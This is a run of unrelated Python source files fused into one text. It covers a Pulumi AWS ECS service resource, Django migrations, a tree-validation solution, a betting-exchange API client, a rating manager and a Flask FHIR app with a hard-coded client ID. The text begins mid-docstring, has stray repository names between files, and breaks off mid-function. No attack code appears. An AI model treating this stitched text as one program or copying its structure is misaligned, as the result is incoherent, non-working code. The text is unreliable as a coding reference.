strategy*](https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_CreateService.html). :param pulumi.Input[pulumi.InputType['ServiceServiceRegistriesArgs']] service_registries: The service discovery registries for the service. The maximum number of `service_registries` blocks is `1`. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of resource tags :param pulumi.Input[str] task_definition: The family and revision (`family:revision`) or full ARN of the task definition that you want to run in your service. Required unless using the `EXTERNAL` deployment controller. If a revision is not specified, the latest `ACTIVE` revision is used. :param pulumi.Input[bool] wait_for_steady_state: If `true`, the provider will wait for the service to reach a steady state (like `aws ecs wait services-stable`) before continuing. Default `false`. """ opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id)) __props__ = dict() __props__["capacity_provider_strategies"] = capacity_provider_strategies __props__["cluster"] = cluster __props__["deployment_controller"] = deployment_controller __props__["deployment_maximum_percent"] = deployment_maximum_percent __props__["deployment_minimum_healthy_percent"] = deployment_minimum_healthy_percent __props__["desired_count"] = desired_count __props__["enable_ecs_managed_tags"] = enable_ecs_managed_tags __props__["enable_execute_command"] = enable_execute_command __props__["force_new_deployment"] = force_new_deployment __props__["health_check_grace_period_seconds"] = health_check_grace_period_seconds __props__["iam_role"] = iam_role __props__["launch_type"] = launch_type __props__["load_balancers"] = load_balancers __props__["name"] = name __props__["network_configuration"] = network_configuration __props__["ordered_placement_strategies"] = ordered_placement_strategies __props__["placement_constraints"] = placement_constraints __props__["platform_version"] = platform_version __props__["propagate_tags"] = propagate_tags __props__["scheduling_strategy"] = scheduling_strategy __props__["service_registries"] = service_registries __props__["tags"] = tags __props__["task_definition"] = task_definition __props__["wait_for_steady_state"] = wait_for_steady_state return Service(resource_name, opts=opts, __props__=__props__) @property @pulumi.getter(name="capacityProviderStrategies") def capacity_provider_strategies(self) -> pulumi.Output[Optional[Sequence['outputs.ServiceCapacityProviderStrategy']]]: """ The capacity provider strategy to use for the service. Can be one or more. Defined below. """ return pulumi.get(self, "capacity_provider_strategies") @property @pulumi.getter def cluster(self) -> pulumi.Output[str]: """ ARN of an ECS cluster """ return pulumi.get(self, "cluster") @property @pulumi.getter(name="deploymentController") def deployment_controller(self) -> pulumi.Output[Optional['outputs.ServiceDeploymentController']]: """ Configuration block containing deployment controller configuration. Defined below. """ return pulumi.get(self, "deployment_controller") @property @pulumi.getter(name="deploymentMaximumPercent") def deployment_maximum_percent(self) -> pulumi.Output[Optional[int]]: """ The upper limit (as a percentage of the service's desiredCount) of the number of running tasks that can be running in a service during a deployment. Not valid when using the `DAEMON` scheduling strategy. """ return pulumi.get(self, "deployment_maximum_percent") @property @pulumi.getter(name="deploymentMinimumHealthyPercent") def deployment_minimum_healthy_percent(self) -> pulumi.Output[Optional[int]]: """ The lower limit (as a percentage of the service's desiredCount) of the number of running tasks that must remain running and healthy in a service during a deployment. """ return pulumi.get(self, "deployment_minimum_healthy_percent") @property @pulumi.getter(name="desiredCount") def desired_count(self) -> pulumi.Output[Optional[int]]: """ The number of instances of the task definition to place and keep running. Defaults to 0. Do not specify if using the `DAEMON` scheduling strategy. """ return pulumi.get(self, "desired_count") @property @pulumi.getter(name="enableEcsManagedTags") def enable_ecs_managed_tags(self) -> pulumi.Output[Optional[bool]]: """ Specifies whether to enable Amazon ECS managed tags for the tasks within the service. """ return pulumi.get(self, "enable_ecs_managed_tags") @property @pulumi.getter(name="enableExecuteCommand") def enable_execute_command(self) -> pulumi.Output[Optional[bool]]: """ Specifies whether to enable Amazon ECS Exec for the tasks within the service. """ return pulumi.get(self, "enable_execute_command") @property @pulumi.getter(name="forceNewDeployment") def force_new_deployment(self) -> pulumi.Output[Optional[bool]]: """ Enable to force a new task deployment of the service. This can be used to update tasks to use a newer Docker image with same image/tag combination (e.g. `myimage:latest`), roll Fargate tasks onto a newer platform version, or immediately deploy `ordered_placement_strategy` and `placement_constraints` updates. """ return pulumi.get(self, "force_new_deployment") @property @pulumi.getter(name="healthCheckGracePeriodSeconds") def health_check_grace_period_seconds(self) -> pulumi.Output[Optional[int]]: """ Seconds to ignore failing load balancer health checks on newly instantiated tasks to prevent premature shutdown, up to 2147483647. Only valid for services configured to use load balancers. """ return pulumi.get(self, "health_check_grace_period_seconds") @property @pulumi.getter(name="iamRole") def iam_role(self) -> pulumi.Output[str]: """ ARN of the IAM role that allows Amazon ECS to make calls to your load balancer on your behalf. This parameter is required if you are using a load balancer with your service, but only if your task definition does not use the `awsvpc` network mode. If using `awsvpc` network mode, do not specify this role. If your account has already created the Amazon ECS service-linked role, that role is used by default for your service unless you specify a role here. """ return pulumi.get(self, "iam_role") @property @pulumi.getter(name="launchType") def launch_type(self) -> pulumi.Output[str]: """ The launch type on which to run your service. The valid values are `EC2` and `FARGATE`. Defaults to `EC2`. """ return pulumi.get(self, "launch_type") @property @pulumi.getter(name="loadBalancers") def load_balancers(self) -> pulumi.Output[Optional[Sequence['outputs.ServiceLoadBalancer']]]: """ A load balancer block. Load balancers documented below. """ return pulumi.get(self, "load_balancers") @property @pulumi.getter def name(self) -> pulumi.Output[str]: """ The name of the service (up to 255 letters, numbers, hyphens, and underscores) """ return pulumi.get(self, "name") @property @pulumi.getter(name="networkConfiguration") def network_configuration(self) -> pulumi.Output[Optional['outputs.ServiceNetworkConfiguration']]: """ The network configuration for the service. This parameter is required for task definitions that use the `awsvpc` network mode to receive their own Elastic Network Interface, and it is not supported for other network modes. """ return pulumi.get(self, "network_configuration") @property @pulumi.getter(name="orderedPlacementStrategies") def ordered_placement_strategies(self) -> pulumi.Output[Optional[Sequence['outputs.ServiceOrderedPlacementStrategy']]]: """ Service level strategy rules that are taken into consideration during task placement. List from top to bottom in order of precedence. Updates to this configuration will take effect next task deployment unless `force_new_deployment` is enabled. The maximum number of `ordered_placement_strategy` blocks is `5`. Defined below. """ return pulumi.get(self, "ordered_placement_strategies") @property @pulumi.getter(name="placementConstraints") def placement_constraints(self) -> pulumi.Output[Optional[Sequence['outputs.ServicePlacementConstraint']]]: """ rules that are taken into consideration during task placement. Updates to this configuration will take effect next task deployment unless `force_new_deployment` is enabled. Maximum number of `placement_constraints` is `10`. Defined below. """ return pulumi.get(self, "placement_constraints") @property @pulumi.getter(name="platformVersion") def platform_version(self) -> pulumi.Output[str]: """ The platform version on which to run your service. Only applicable for `launch_type` set to `FARGATE`. Defaults to `LATEST`. More information about Fargate platform versions can be found in the [AWS ECS User Guide](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/platform_versions.html). """ return pulumi.get(self, "platform_version") @property @pulumi.getter(name="propagateTags") def propagate_tags(self) -> pulumi.Output[Optional[str]]: """ Specifies whether to propagate the tags from the task definition or the service to the tasks. The valid values are `SERVICE` and `TASK_DEFINITION`. """ return pulumi.get(self, "propagate_tags") @property @pulumi.getter(name="schedulingStrategy") def scheduling_strategy(self) -> pulumi.Output[Optional[str]]: """ The scheduling strategy to use for the service. The valid values are `REPLICA` and `DAEMON`. Defaults to `REPLICA`. Note that [*Tasks using the Fargate launch type or the `CODE_DEPLOY` or `EXTERNAL` deployment controller types don't support the `DAEMON` scheduling strategy*](https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_CreateService.html). """ return pulumi.get(self, "scheduling_strategy") @property @pulumi.getter(name="serviceRegistries") def service_registries(self) -> pulumi.Output[Optional['outputs.ServiceServiceRegistries']]: """ The service discovery registries for the service. The maximum number of `service_registries` blocks is `1`. """ return pulumi.get(self, "service_registries") @property @pulumi.getter def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]: """ Key-value map of resource tags """ return pulumi.get(self, "tags") @property @pulumi.getter(name="taskDefinition") def task_definition(self) -> pulumi.Output[Optional[str]]: """ The family and revision (`family:revision`) or full ARN of the task definition that you want to run in your service. Required unless using the `EXTERNAL` deployment controller. If a revision is not specified, the latest `ACTIVE` revision is used. """ return pulumi.get(self, "task_definition") @property @pulumi.getter(name="waitForSteadyState") def wait_for_steady_state(self) -> pulumi.Output[Optional[bool]]: """ If `true`, the provider will wait for the service to reach a steady state (like `aws ecs wait services-stable`) before continuing. Default `false`. """ return pulumi.get(self, "wait_for_steady_state") def translate_output_property(self, prop): return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop def translate_input_property(self, prop): return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop # Generated by Django 3.2 on 2022-02-02 13:07 from django.db import migrations, models import django.db.models.deletion import django_countries.fields class Migration(migrations.Migration): dependencies = [ ('profiles', '0001_initial'), ('checkout', '0001_initial'), ] operations = [ migrations.AddField( model_name='order', name='user_profile', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='orders', to='profiles.userprofile'), ), migrations.AlterField( model_name='order', name='country', field=django_countries.fields.CountryField(max_length=2), ), ] kkcookies99/UAST class Solution: def dfs(self, node: TreeNode, ans: List[int]): if not node: return self.dfs(node.left, ans) ans.append(node.val) self.dfs(node.right, ans) def XXX(self, root: TreeNode) -> bool: ans = [] self.dfs(root, ans) if len(ans) <= 1: return True for i in range(1, len(ans)): if ans[i] <= ans[i - 1]: return False return True bluesky-api/python-client0 try: import importlib.metadata as importlib_metadata except ModuleNotFoundError: import importlib_metadata __version__ = importlib_metadata.version("blueskyapi") import requests from typing import Union, List from .baseendpoint import BaseEndpoint from .. import resources from ..filters import market_filter, time_range from ..utils import clean_locals class Betting(BaseEndpoint): """ Betting operations. """ URI = "SportsAPING/v1.0/" def list_event_types( self, filter: dict = market_filter(), locale: str = None, session: requests.Session = None, lightweight: bool = None, ) -> Union[list, List[resources.EventTypeResult]]: """ Returns a list of Event Types (i.e. Sports) associated with the markets selected by the MarketFilter. :param dict filter: The filter to select desired markets :param str locale: The language used for the response :param requests.session session: Requests session object :param bool lightweight: If True will return dict not a resource :rtype: list[resources.EventTypeResult] """ params = clean_locals(locals()) method = "%s%s" % (self.URI, "listEventTypes") (response, response_json, elapsed_time) = self.request(method, params, session) return self.process_response( response_json, resources.EventTypeResult, elapsed_time, lightweight, ) def list_competitions( self, filter: dict = market_filter(), locale: str = None, session: requests.Session = None, lightweight: bool = None, ) -> Union[list, List[resources.CompetitionResult]]: """ Returns a list of Competitions (i.e., World Cup 2013) associated with the markets selected by the MarketFilter. :param dict filter: The filter to select desired markets :param str locale: The language used for the response :param requests.session session: Requests session object :param bool lightweight: If True will return dict not a resource :rtype: list[resources.CompetitionResult] """ params = clean_locals(locals()) method = "%s%s" % (self.URI, "listCompetitions") (response, response_json, elapsed_time) = self.request(method, params, session) return self.process_response( response_json, resources.CompetitionResult, elapsed_time, lightweight, ) def list_time_ranges( self, filter: dict = market_filter(), granularity: str = "DAYS", session: requests.Session = None, lightweight: bool = None, ) -> Union[list, List[resources.TimeRangeResult]]: """ Returns a list of time ranges in the granularity specified in the request (i.e. 3PM to 4PM, Aug 14th to Aug 15th) associated with the markets selected by the MarketFilter. :param dict filter: The filter to select desired markets :param str granularity: The granularity of time periods that correspond to markets selected by the market filter :param requests.session session: Requests session object :param bool lightweight: If True will return dict not a resource :rtype: list[resources.TimeRangeResult] """ params = clean_locals(locals()) method = "%s%s" % (self.URI, "listTimeRanges") (response, response_json, elapsed_time) = self.request(method, params, session) return self.process_response( response_json, resources.TimeRangeResult, elapsed_time, lightweight, ) def list_events( self, filter: dict = market_filter(), locale: str = None, session: requests.Session = None, lightweight: bool = None, ) -> Union[list, List[resources.EventResult]]: """ Returns a list of Events (i.e, Reading vs. Man United) associated with the markets selected by the MarketFilter. :param dict filter: The filter to select desired markets :param str locale: The language used for the response :param requests.session session: Requests session object :param bool lightweight: If True will return dict not a resource :rtype: list[resources.EventResult] """ params = clean_locals(locals()) method = "%s%s" % (self.URI, "listEvents") (response, response_json, elapsed_time) = self.request(method, params, session) return self.process_response( response_json, resources.EventResult, elapsed_time, lightweight ) def list_market_types( self, filter: dict = market_filter(), locale: str = None, session: requests.Session = None, lightweight: bool = None, ) -> Union[list, List[resources.MarketTypeResult]]: """ Returns a list of market types (i.e. MATCH_ODDS, NEXT_GOAL) associated with the markets selected by the MarketFilter. :param dict filter: The filter to select desired markets :param str locale: The language used for the response :param requests.session session: Requests session object :param bool lightweight: If True will return dict not a resource :rtype: list[resources.MarketTypeResult] """ params = clean_locals(locals()) method = "%s%s" % (self.URI, "listMarketTypes") (response, response_json, elapsed_time) = self.request(method, params, session) return self.process_response( response_json, resources.MarketTypeResult, elapsed_time, lightweight, ) def list_countries( self, filter: dict = market_filter(), locale: str = None, session: requests.Session = None, lightweight: bool = None, ) -> Union[list, List[resources.CountryResult]]: """ Returns a list of Countries associated with the markets selected by the MarketFilter. :param dict filter: The filter to select desired markets :param str locale: The language used for the response :param requests.session session: Requests session object :param bool lightweight: If True will return dict not a resource :rtype: list[resources.CountryResult] """ params = clean_locals(locals()) method = "%s%s" % (self.URI, "listCountries") (response, response_json, elapsed_time) = self.request(method, params, session) return self.process_response( response_json, resources.CountryResult, elapsed_time, lightweight ) def list_venues( self, filter: dict = market_filter(), locale: str = None, session: requests.Session = None, lightweight: bool = None, ) -> Union[list, List[resources.VenueResult]]: """ Returns a list of Venues (i.e. Cheltenham, Ascot) associated with the markets selected by the MarketFilter. :param dict filter: The filter to select desired markets :param str locale: The language used for the response :param requests.session session: Requests session object :param bool lightweight: If True will return dict not a resource :rtype: list[resources.VenueResult] """ params = clean_locals(locals()) method = "%s%s" % (self.URI, "listVenues") (response, response_json, elapsed_time) = self.request(method, params, session) return self.process_response( response_json, resources.VenueResult, elapsed_time, lightweight ) def list_market_catalogue( self, filter: dict = market_filter(), market_projection: list = None, sort: str = None, max_results: int = 1, locale: str = None, session: requests.Session = None, lightweight: bool = None, ) -> Union[list, List[resources.MarketCatalogue]]: """ Returns a list of information about published (ACTIVE/SUSPENDED) markets that does not change (or changes very rarely). :param dict filter: The filter to select desired markets :param list market_projection: The type and amount of data returned about the market :param str sort: The order of the results :param int max_results: Limit on the total number of results returned, must be greater than 0 and less than or equal to 10000 :param str locale: The language used for the response :param requests.session session: Requests session object :param bool lightweight: If True will return dict not a resource :rtype: list[resources.MarketCatalogue] """ params = clean_locals(locals()) method = "%s%s" % (self.URI, "listMarketCatalogue") (response, response_json, elapsed_time) = self.request(method, params, session) return self.process_response( response_json, resources.MarketCatalogue, elapsed_time, lightweight, ) def list_market_book( self, market_ids: list, price_projection: dict = None, order_projection: str = None, match_projection: str = None, include_overall_position: bool = None, partition_matched_by_strategy_ref: bool = None, customer_strategy_refs: list = None, currency_code: str = None, matched_since: str = None, bet_ids: list = None, locale: str = None, session: requests.Session = None, lightweight: bool = None, ) -> Union[list, List[resources.MarketBook]]: """ Returns a list of dynamic data about markets. Dynamic data includes prices, the status of the market, the status of selections, the traded volume, and the status of any orders you have placed in the market :param list market_ids: One or more market ids :param dict price_projection: The projection of price data you want to receive in the response :param str order_projection: The orders you want to receive in the response :param str match_projection: If you ask for orders, specifies the representation of matches :param bool include_overall_position: If you ask for orders, returns matches for each selection :param bool partition_matched_by_strategy_ref: If you ask for orders, returns the breakdown of matches by strategy for each selection :param list customer_strategy_refs: If you ask for orders, restricts the results to orders matching any of the specified set of customer defined strategies :param str currency_code: A Betfair standard currency code :param str matched_since: If you ask for orders, restricts the results to orders that have at least one fragment matched since the specified date :param list bet_ids: If you ask for orders, restricts the results to orders with the specified bet IDs :param str locale: The language used for the response :param requests.session session: Requests session object :param bool lightweight: If True will return dict not a resource :rtype: list[resources.MarketBook] """ params = clean_locals(locals()) method = "%s%s" % (self.URI, "listMarketBook") (response, response_json, elapsed_time) = self.request(method, params, session) return self.process_response( response_json, resources.MarketBook, elapsed_time, lightweight ) def list_runner_book( self, market_id: str, selection_id: int, handicap: float = None, price_projection: dict = None, order_projection: str = None, match_projection: str = None, include_overall_position: bool = None, partition_matched_by_strategy_ref: bool = None, customer_strategy_refs: list = None, currency_code: str = None, matched_since: str = None, bet_ids: list = None, locale: str = None, session: requests.Session = None, lightweight: bool = None, ) -> Union[list, List[resources.MarketBook]]: """ Returns a list of dynamic data about a market and a specified runner. Dynamic data includes prices, the status of the market, the status of selections, the traded volume, and the status of any orders you have placed in the market :param unicode market_id: The unique id for the market :param int selection_id: The unique id for the selection in the market :param double handicap: The projection of price data you want to receive in the response :param dict price_projection: The projection of price data you want to receive in the response :param str order_projection: The orders you want to receive in the response :param str match_projection: If you ask for orders, specifies the representation of matches :param bool include_overall_position: If you ask for orders, returns matches for each selection :param bool partition_matched_by_strategy_ref: If you ask for orders, returns the breakdown of matches by strategy for each selection :param list customer_strategy_refs: If you ask for orders, restricts the results to orders matching any of the specified set of customer defined strategies :param str currency_code: A Betfair standard currency code :param str matched_since: If you ask for orders, restricts the results to orders that have at least one fragment matched since the specified date :param list bet_ids: If you ask for orders, restricts the results to orders with the specified bet IDs :param str locale: The language used for the response :param requests.session session: Requests session object :param bool lightweight: If True will return dict not a resource :rtype: list[resources.MarketBook] """ params = clean_locals(locals()) method = "%s%s" % (self.URI, "listRunnerBook") (response, response_json, elapsed_time) = self.request(method, params, session) return self.process_response( response_json, resources.MarketBook, elapsed_time, lightweight, # todo MarketBook? ) def list_current_orders( self, bet_ids: list = None, market_ids: list = None, order_projection: str = None, customer_order_refs: list = None, customer_strategy_refs: list = None, date_range: dict = time_range(), order_by: str = None, sort_dir: str = None, from_record: int = None, record_count: int = None, session: requests.Session = None, lightweight: bool = None, ) -> Union[dict, resources.CurrentOrders]: """ Returns a list of your current orders. :param list bet_ids: If you ask for orders, restricts the results to orders with the specified bet IDs :param list market_ids: One or more market ids :param str order_projection: Optionally restricts the results to the specified order status :param list customer_order_refs: Optionally restricts the results to the specified customer order references :param list customer_strategy_refs: Optionally restricts the results to the specified customer strategy references :param dict date_range: Optionally restricts the results to be from/to the specified date, these dates are contextual to the orders being returned and therefore the dates used to filter on will change to placed, matched, voided or settled dates depending on the orderBy :param str order_by: Specifies how the results will be ordered. If no value is passed in, it defaults to BY_BET :param str sort_dir: Specifies the direction the results will be sorted in :param int from_record: Specifies the first record that will be returned :param int record_count: Specifies how many records will be returned from the index position 'fromRecord' :param requests.session session: Requests session object :param bool lightweight: If True will return dict not a resource :rtype: resources.CurrentOrders """ params = clean_locals(locals()) method = "%s%s" % (self.URI, "listCurrentOrders") (response, response_json, elapsed_time) = self.request(method, params, session) return self.process_response( response_json, resources.CurrentOrders, elapsed_time, lightweight ) def list_cleared_orders( self, bet_status: str = "SETTLED", event_type_ids: list = None, event_ids: list = None, market_ids: list = None, runner_ids: list = None, bet_ids: list = None, customer_order_refs: list = None, customer_strategy_refs: list = None, side: str = None, settled_date_range: dict = time_range(), group_by: str = None, include_item_description: bool = None, locale: str = None, from_record: int = None, record_count: int = None, session: requests.Session = None, lightweight: bool = None, ) -> Union[dict, resources.ClearedOrders]: """ Returns a list of settled bets based on the bet status, ordered by settled date. :param str bet_status: Restricts the results to the specified status :param list event_type_ids: Optionally restricts the results to the specified Event Type IDs :param list event_ids: Optionally restricts the results to the specified Event IDs :param list market_ids: Optionally restricts the results to the specified market IDs :param list runner_ids: Optionally restricts the results to the specified Runners :param list bet_ids: If you ask for orders, restricts the results to orders with the specified bet IDs :param list customer_order_refs: Optionally restricts the results to the specified customer order references :param list customer_strategy_refs: Optionally restricts the results to the specified customer strategy references :param str side: Optionally restricts the results to the specified side :param dict settled_date_range: Optionally restricts the results to be from/to the specified settled date :param str group_by: How to aggregate the lines, if not supplied then the lowest level is returned :param bool include_item_description: If true then an ItemDescription object is included in the response :param str locale: The language used for the response :param int from_record: Specifies the first record that will be returned :param int record_count: Specifies how many records will be returned from the index position 'fromRecord' :param requests.session session: Requests session object :param bool lightweight: If True will return dict not a resource :rtype: resources.ClearedOrders """ params = clean_locals(locals()) method = "%s%s" % (self.URI, "listClearedOrders") (response, response_json, elapsed_time) = self.request(method, params, session) return self.process_response( response_json, resources.ClearedOrders, elapsed_time, lightweight ) def list_market_profit_and_loss( self, market_ids: list, include_settled_bets: bool = None, include_bsp_bets: bool = None, net_of_commission: bool = None, session: requests.Session = None, lightweight: bool = None, ) -> Union[list, List[resources.MarketProfitLoss]]: """ Retrieve profit and loss for a given list of OPEN markets. :param list market_ids: List of markets to calculate profit and loss :param bool include_settled_bets: Option to include settled bets (partially settled markets only) :param bool include_bsp_bets: Option to include BSP bets :param bool net_of_commission: Option to return profit and loss net of users current commission rate for this market including any special tariffs :param requests.session session: Requests session object :param bool lightweight: If True will return dict not a resource :rtype: list[resources.MarketProfitLoss] """ params = clean_locals(locals()) method = "%s%s" % (self.URI, "listMarketProfitAndLoss") (response, response_json, elapsed_time) = self.request(method, params, session) return self.process_response( response_json, resources.MarketProfitLoss, elapsed_time, lightweight, ) def place_orders( self, market_id: str, instructions: list, customer_ref: str = None, market_version: dict = None, customer_strategy_ref: str = None, async_: bool = None, session: requests.Session = None, lightweight: bool = None, ) -> Union[dict, resources.PlaceOrders]: """ Place new orders into market. :param str market_id: The market id these orders are to be placed on :param list instructions: The number of place instructions :param str customer_ref: Optional parameter allowing the client to pass a unique string (up to 32 chars) that is used to de-dupe mistaken re-submissions :param dict market_version: Optional parameter allowing the client to specify which version of the market the orders should be placed on, e.g. "{'version': 123456}" :param str customer_strategy_ref: An optional reference customers can use to specify which strategy has sent the order :param bool async_: An optional flag (not setting equates to false) which specifies if the orders should be placed asynchronously :param requests.session session: Requests session object :param bool lightweight: If True will return dict not a resource :rtype: resources.PlaceOrders """ params = clean_locals(locals()) method = "%s%s" % (self.URI, "placeOrders") (response, response_json, elapsed_time) = self.request(method, params, session) return self.process_response( response_json, resources.PlaceOrders, elapsed_time, lightweight ) def cancel_orders( self, market_id: str = None, instructions: list = None, customer_ref: str = None, session: requests.Session = None, lightweight: bool = None, ) -> Union[dict, resources.CancelOrders]: """ Cancel all bets OR cancel all bets on a market OR fully or partially cancel particular orders on a market. :param str market_id: If marketId and betId aren't supplied all bets are cancelled :param list instructions: All instructions need to be on the same market :param str customer_ref: Optional parameter allowing the client to pass a unique string (up to 32 chars) that is used to de-dupe mistaken re-submissions :param requests.session session: Requests session object :param bool lightweight: If True will return dict not a resource :rtype: resources.CancelOrders """ params = clean_locals(locals()) method = "%s%s" % (self.URI, "cancelOrders") (response, response_json, elapsed_time) = self.request(method, params, session) return self.process_response( response_json, resources.CancelOrders, elapsed_time, lightweight ) def update_orders( self, market_id: str = None, instructions: list = None, customer_ref: str = None, session: requests.Session = None, lightweight: bool = None, ) -> Union[dict, resources.UpdateOrders]: """ Update non-exposure changing field. :param str market_id: The market id these orders are to be placed on :param list instructions: The update instructions :param str customer_ref: Optional parameter allowing the client to pass a unique string (up to 32 chars) that is used to de-dupe mistaken re-submissions :param requests.session session: Requests session object :param bool lightweight: If True will return dict not a resource :rtype: resources.UpdateOrders """ params = clean_locals(locals()) method = "%s%s" % (self.URI, "updateOrders") (response, response_json, elapsed_time) = self.request(method, params, session) return self.process_response( response_json, resources.UpdateOrders, elapsed_time, lightweight ) def replace_orders( self, market_id: str, instructions: list, customer_ref: str = None, market_version: dict = None, async_: bool = None, session: requests.Session = None, lightweight: bool = None, ) -> Union[dict, resources.ReplaceOrders]: """ This operation is logically a bulk cancel followed by a bulk place. The cancel is completed first then the new orders are placed. :param str market_id: The market id these orders are to be placed on :param list instructions: The number of replace instructions. The limit of replace instructions per request is 60 :param str customer_ref: Optional parameter allowing the client to pass a unique string (up to 32 chars) that is used to de-dupe mistaken re-submissions :param dict market_version: Optional parameter allowing the client to specify which version of the market the orders should be placed on, e.g. "{'version': 123456}" :param bool async_: An optional flag (not setting equates to false) which specifies if the orders should be replaced asynchronously :param requests.session session: Requests session object :param bool lightweight: If True will return dict not a resource :rtype: resources.ReplaceOrders """ params = clean_locals(locals()) method = "%s%s" % (self.URI, "replaceOrders") (response, response_json, elapsed_time) = self.request(method, params, session) return self.process_response( response_json, resources.ReplaceOrders, elapsed_time, lightweight ) DLRSP/django-sp1-10 # Generated by Django 1.11.4 on 2017-08-10 18:43 import user_sessions.models from django.db import migrations class Migration(migrations.Migration): dependencies = [ ("axes", "0003_auto_20160322_0929"), ("oauth2_provider", "0002_auto_20190406_1805"), ("social_django", "0006_partial"), ("otp_totp", "0001_initial"), ("user_sessions", "0003_auto_20161205_1516"), ("two_factor", "0005_auto_20160224_0450"), ("otp_static", "0001_initial"), ("socialprofile", "0001_initial"), ] operations = [ migrations.CreateModel( name="ProxyAccessAttempt", fields=[], options={ "verbose_name": "Monitor: access attempt", "proxy": True, "verbose_name_plural": "Monitor: access attempts", "indexes": [], }, bases=("axes.accessattempt",), ), migrations.CreateModel( name="ProxyAccessLog", fields=[], options={ "verbose_name": "Monitor: access log", "proxy": True, "verbose_name_plural": "Monitor: access logs", "indexes": [], }, bases=("axes.accesslog",), ), migrations.CreateModel( name="ProxyAccessToken", fields=[], options={ "verbose_name": "Token: access token", "proxy": True, "verbose_name_plural": "Token: access tokens", "indexes": [], }, bases=("oauth2_provider.accesstoken",), ), migrations.CreateModel( name="ProxyApplication", fields=[], options={ "verbose_name": "Token: application", "proxy": True, "verbose_name_plural": "Token: applications", "indexes": [], }, bases=("oauth2_provider.application",), ), migrations.CreateModel( name="ProxyAssociation", fields=[], options={ "verbose_name": "OAuth: association", "proxy": True, "verbose_name_plural": "OAuth: associations", "indexes": [], }, bases=("social_django.association",), ), migrations.CreateModel( name="ProxyGrant", fields=[], options={ "verbose_name": "Token: grant", "proxy": True, "verbose_name_plural": "Token: grants", "indexes": [], }, bases=("oauth2_provider.grant",), ), migrations.CreateModel( name="ProxyNonce", fields=[], options={ "verbose_name": "OAuth: nonce", "proxy": True, "verbose_name_plural": "OAuth: nonces", "indexes": [], }, bases=("social_django.nonce",), ), migrations.CreateModel( name="ProxyPhoneDevice", fields=[], options={ "verbose_name": "Otp: phone device", "proxy": True, "verbose_name_plural": "Otp: phone devices", "indexes": [], }, bases=("two_factor.phonedevice",), ), migrations.CreateModel( name="ProxyRefreshToken", fields=[], options={ "verbose_name": "Token: refresh token", "proxy": True, "verbose_name_plural": "Token: refresh tokens", "indexes": [], }, bases=("oauth2_provider.refreshtoken",), ), migrations.CreateModel( name="ProxySession", fields=[], options={ "verbose_name": "Monitor: sessione", "proxy": True, "verbose_name_plural": "Monitor: sessioni", "indexes": [], }, bases=("user_sessions.session",), managers=[ ("objects", user_sessions.models.SessionManager()), ], ), migrations.CreateModel( name="ProxyStaticDevice", fields=[], options={ "verbose_name": "Otp: static device", "proxy": True, "verbose_name_plural": "Otp: static devices", "indexes": [], }, bases=("otp_static.staticdevice",), ), migrations.CreateModel( name="ProxyTOTPDevice", fields=[], options={ "verbose_name": "Otp: TOTP device", "proxy": True, "verbose_name_plural": "Otp: TOTP devices", "indexes": [], }, bases=("otp_totp.totpdevice",), ), migrations.CreateModel( name="ProxyUserSocialAuth", fields=[], options={ "verbose_name": "OAuth: user social auth", "proxy": True, "verbose_name_plural": "OAuth: user social auths", "indexes": [], }, bases=("social_django.usersocialauth",), ), ] from django.contrib.contenttypes.models import ContentType from django.db import models from .categories import category_value class OverallRatingManager(models.Manager): def top_rated(self, klass, category=""): cat = category_value(klass, category) if cat is None: cat = "" qs = self.filter( content_type=ContentType.objects.get_for_model(klass), category=cat ) qs = qs.extra( select={ "sortable_rating": "COALESCE(rating, 0)" } ) return qs.order_by("-sortable_rating") 0 # -*- coding: utf-8 -*- import logging from fhirclient import client from fhirclient.models.medication import Medication from fhirclient.models.medicationrequest import MedicationRequest from fhirclient.models.claim import Claim from fhirclient.models.encounter import Encounter from flask import Flask, render_template, json, request, redirect, jsonify, url_for, session # app setup #'scope': 'launch/patient fhirUser openid patient/*.read user/*.read' smart_defaults = { 'app_id': 'HMpLixwYJvGntZhNPXdIgMJVrXeGA7qg', 'app_secret': '', 'api_base': 'https://gcp-hcls-test.apigee.net/v1/r4/carin/', 'redirect_uri': 'http://localhost:8000/fhir-app/', 'scope': 'launch/patient fhirUser openid patient/*.read' } patient_config = { 'Mrs. ': '5b72debb-60d1-49f9-8f3a-8220f894ca95', ' Ritchie586': '22efb1f8-3d1f-4cc6-9dfc-60aabcbe114c', 'Mrs. Margery365 Kunde533': 'a28340a7-41e5-47ef-b0c9-e984341fa101', } app = Flask(__name__) def _save_state(state): session['state'] = state def _get_smart(): state = session.get('state') if state: return client.FHIRClient(state=state, save_func=_save_state) else: return client.FHIRClient(settings=smart_defaults, save_func=_save_state) def _logout(): if 'state' in session: smart = _get_smart() smart.reset_patient() def _reset(): if 'state' in session: del session['state'] def _get_prescriptions(smart): bundle = MedicationRequest.where({'patient': smart.patient_id}).perform(smart.server) pres = [be.resource for be in bundle.entry] if bundle is not None and bundle.entry is not None else None if pres is not None and len(pres) > 0: return pres return None def _get_claims(smart): bundle = Claim.where({'patient': smart.patient_id}).perform(smart.server) pres = [be.resource for be in bundle.entry] if bundle is not None and bundle.entry is not None else None if pres is not None and len(pres) > 0: return pres return None def _get_medication_by_ref(ref, smart): #med_id = ref.split("/")[1] #med_id = ref.split("#")[1] #return Medication.read(med_id, smart.server).code med = ref.resolved(Medication) return med.code def _med_name(med): if med.coding: #name = next((coding.display for coding in med.coding if coding.system == 'http://www.nlm.nih.gov/research/umls/rxnorm'), None) name = next((coding.display for coding in med.coding if coding.system == 'http://snomed.info/sct'), None) if name: return name if med.text and med.text: return med.text return "Unnamed Medication(TM)" def _get_med_name(prescription, client=None): if prescription.medicationCodeableConcept is not None: med = prescription.medicationCodeableConcept return _med_name(med) elif prescription.medicationReference is not None and client is not None: #med = _get_medication_by_ref(prescription.medicationReference.reference, client) med = _get_medication_by_ref(prescription.medicationReference, client) return _med_name(med) else: return 'Error: medication not found' def _get_claim_name(claim, client=None): if claim.procedure is not None: med = claim.procedure return med #elif claim.medicationReference is not None and client is not None: # med = _get_medication_by_ref(claim.medicationReference, client) # return 